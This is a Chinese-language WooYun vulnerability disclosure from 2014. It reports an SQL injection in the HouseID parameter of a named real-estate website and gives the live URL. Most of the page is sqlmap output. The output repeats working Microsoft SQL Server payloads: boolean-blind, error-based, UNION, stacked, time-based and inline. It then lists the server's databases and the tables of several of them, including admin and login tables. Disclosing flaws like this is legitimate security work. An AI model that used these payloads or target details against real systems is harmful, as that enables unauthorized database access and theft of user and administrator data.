当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064875

漏洞标题:二泉房产网SQL注入一枚涉及多个库表

相关厂商:二泉房产网

漏洞作者: 追逐天堂

提交时间:2014-06-14 18:11

修复时间:2014-07-29 18:12

公开时间:2014-07-29 18:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

“澡堂新开业,优惠啦”“什么价”“男澡堂10,女澡堂100”“男女差距这么大!”“是这样的,请问先生你要进哪个?”

详细说明:

注入地址:

http://house.wst.cn/NewHouse/ShowJiage.asp?HouseID=951


1.png


2.png


3.png


4.png


5.png

漏洞证明:

sqlmap identified the following injection points with a total of 49 HTTP(s) requests:
---
Place: GET
Parameter: HouseID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HouseID=951 AND 8143=8143
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: HouseID=951 AND 9665=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9665=9665) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: HouseID=951 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+CHAR(75)+CHAR(78)+CHAR(65)+CHAR(70)+CHAR(68)+CHAR(80)+CHAR(108)+CHAR(112)+CHAR(86)+CHAR(89)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: HouseID=951; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: HouseID=951 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: HouseID=(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3118=3118) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: HouseID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HouseID=951 AND 8143=8143
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: HouseID=951 AND 9665=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9665=9665) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: HouseID=951 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+CHAR(75)+CHAR(78)+CHAR(65)+CHAR(70)+CHAR(68)+CHAR(80)+CHAR(108)+CHAR(112)+CHAR(86)+CHAR(89)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: HouseID=951; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: HouseID=951 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: HouseID=(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3118=3118) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [14]:
[*] baby
[*] efs
[*] Financial
[*] hongdun
[*] master
[*] model
[*] msdb
[*] tempdb
[*] women
[*] wst_edu
[*] wst_house
[*] wst_pet
[*] wxfulian
[*] wxjiaju
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: HouseID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HouseID=951 AND 8143=8143
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: HouseID=951 AND 9665=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9665=9665) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: HouseID=951 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+CHAR(75)+CHAR(78)+CHAR(65)+CHAR(70)+CHAR(68)+CHAR(80)+CHAR(108)+CHAR(112)+CHAR(86)+CHAR(89)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: HouseID=951; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: HouseID=951 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: HouseID=(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3118=3118) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
current user is DBA: False
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: HouseID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HouseID=951 AND 8143=8143
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: HouseID=951 AND 9665=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9665=9665) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: HouseID=951 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+CHAR(75)+CHAR(78)+CHAR(65)+CHAR(70)+CHAR(68)+CHAR(80)+CHAR(108)+CHAR(112)+CHAR(86)+CHAR(89)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: HouseID=951; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: HouseID=951 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: HouseID=(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3118=3118) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
current database: 'wst_house'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: HouseID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HouseID=951 AND 8143=8143
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: HouseID=951 AND 9665=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9665=9665) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: HouseID=951 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+CHAR(75)+CHAR(78)+CHAR(65)+CHAR(70)+CHAR(68)+CHAR(80)+CHAR(108)+CHAR(112)+CHAR(86)+CHAR(89)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: HouseID=951; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: HouseID=951 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: HouseID=(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3118=3118) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
current user: 'wst_house'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: HouseID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: HouseID=951 AND 8143=8143
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: HouseID=951 AND 9665=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (9665=9665) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: HouseID=951 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+CHAR(75)+CHAR(78)+CHAR(65)+CHAR(70)+CHAR(68)+CHAR(80)+CHAR(108)+CHAR(112)+CHAR(86)+CHAR(89)+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: HouseID=951; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: HouseID=951 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: HouseID=(SELECT CHAR(113)+CHAR(119)+CHAR(101)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3118=3118) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(104)+CHAR(115)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2005
Database: wst_house
[156 tables]
+---------------------------------------------------+
| Foundation_District |
| Foundation_city |
| Foundation_nation |
| Foundation_prov |
| PE_AdZone |
| PE_Admin |
| PE_Advertisement |
| PE_Announce |
| PE_AreaCollection |
| PE_Article |
| PE_Author |
| PE_Bank |
| PE_BankrollItem |
| PE_Card |
| PE_Channel |
| PE_City |
| PE_Class |
| PE_Classroom |
| PE_Client |
| PE_Comment |
| PE_Company |
| PE_ComplainItem |
| PE_Config |
| PE_ConsumeLog |
| PE_Contacter |
| PE_CopyFrom |
| PE_Country |
| PE_Deal_data |
| PE_DeliverCharge |
| PE_DeliverItem |
| PE_DeliverType |
| PE_Dictionary |
| PE_DownError |
| PE_DownServer |
| PE_Equipment |
| PE_Favorite |
| PE_Field |
| PE_Filters |
| PE_Friend |
| PE_FriendSite |
| PE_FsKind |
| PE_Function_Update |
| PE_GuestBook |
| PE_GuestKind |
| PE_HistrolyNews |
| PE_HouseArea |
| PE_HouseCS |
| PE_HouseCZ |
| PE_HouseConfig |
| PE_HouseHZ |
| PE_HouseQG |
| PE_HouseQZ |
| PE_InfoS |
| PE_InvoiceItem |
| PE_Item |
| PE_JobCategory |
| PE_JsFile |
| PE_KeyLink |
| PE_Label |
| PE_Log |
| PE_MailChannel |
| PE_Message |
| PE_NewHouse_Apartment |
| PE_NewHouse_Apartment |
| PE_NewHouse_Area |
| PE_NewHouse_HD_member |
| PE_NewHouse_Permits |
| PE_NewHouse_Price |
| PE_NewHouse_Shop |
| PE_NewHouse_Type |
| PE_NewHouse_WebSale |
| PE_NewKeys |
| PE_OrderFormItem |
| PE_OrderFormItem |
| PE_PageClass |
| PE_PageClass |
| PE_PayPlatform |
| PE_Payment |
| PE_PaymentType |
| PE_Photo |
| PE_Position |
| PE_PositionSupplyInfo |
| PE_PresentProject |
| PE_Producer |
| PE_Product |
| PE_Province |
| PE_RechargeLog |
| PE_Resume |
| PE_ServiceItem |
| PE_ShopFocus |
| PE_ShopHouse |
| PE_ShoppingCarts |
| PE_Skin |
| PE_Soft |
| PE_SpaceBook |
| PE_SpaceBook |
| PE_SpaceComment |
| PE_SpaceDiary |
| PE_SpaceKind |
| PE_SpaceLink |
| PE_SpaceMusic |
| PE_SpacePhoto |
| PE_SpaceVisitor |
| PE_Special |
| PE_SubCompany |
| PE_Supply_Company |
| PE_Supply_Company |
| PE_SurveyAnswer |
| PE_SurveyAnswer |
| PE_SurveyInput |
| PE_SurveyQuestion |
| PE_TemplateProject |
| PE_TemplateProject |
| PE_Trademark |
| PE_TransferItem |
| PE_Tv_Item_Area |
| PE_Tv_Item_Area |
| PE_Tv_Item_Class |
| PE_Tv_Item_Comment |
| PE_UsedDetail |
| PE_UserGroup |
| PE_UserGroup |
| PE_Vote |
| PE_WorkPlace |
| PE_XinQing |
| PE_ZT_CENTER |
| PE_ZT_Class |
| ad_admin |
| admin |
| bigclass |
| calling_link |
| company |
| content_mb |
| dtproperties |
| email |
| gb_admin |
| gb_main |
| magazine_view |
| mbhm |
| news |
| ntime |
| onlinezj |
| pangolin_test_table |
| s_bigclass |
| s_content |
| s_message |
| s_smallclass |
| s_type |
| s_user |
| s_x |
| smallclass |
| st_content |
| t_jiaozhu |
| user_mb |
| wshr |
| x_mb |
+---------------------------------------------------+
Database: efs
[36 tables]
+---------------------------------------------------+
| Announcement |
| HouseTradeFeedBack |
| JJR_gg |
| JJR_tjfy |
| Member_Pope_List |
| Member_Pope_List |
| Member_Pope_Role |
| PostAmountLimit |
| PostFilter |
| VIEW_HouseSourceList2 |
| VIEW_MemberList |
| VIEW_OldSourceList2 |
| ZhongJie_Base |
| ZhongJie_DefGrade |
| ZhongJie_GG |
| ZhongJie_Log |
| dtproperties |
| housesource_images |
| housesource_images |
| housesourcerequest |
| ip |
| login_log |
| manager_base |
| manager_info1 |
| manager_session |
| oldsource_images |
| oldsource_images |
| oldsource_map |
| oldsourcerequest |
| online_manage_resclass_popedom |
| popedom_list |
| popedom_role |
| sys_log_list |
| view_HouseSourceFirstImgClientView |
| view_OldSourceFirstImgClientView |
| view_manager |
+---------------------------------------------------+
Database: master
[289 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats_columns |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: msdb
[9 tables]
+---------------------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| suspect_pages |
+---------------------------------------------------+

修复方案:

你比我懂。。。。。。。。。

版权声明:转载请注明来源 追逐天堂@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论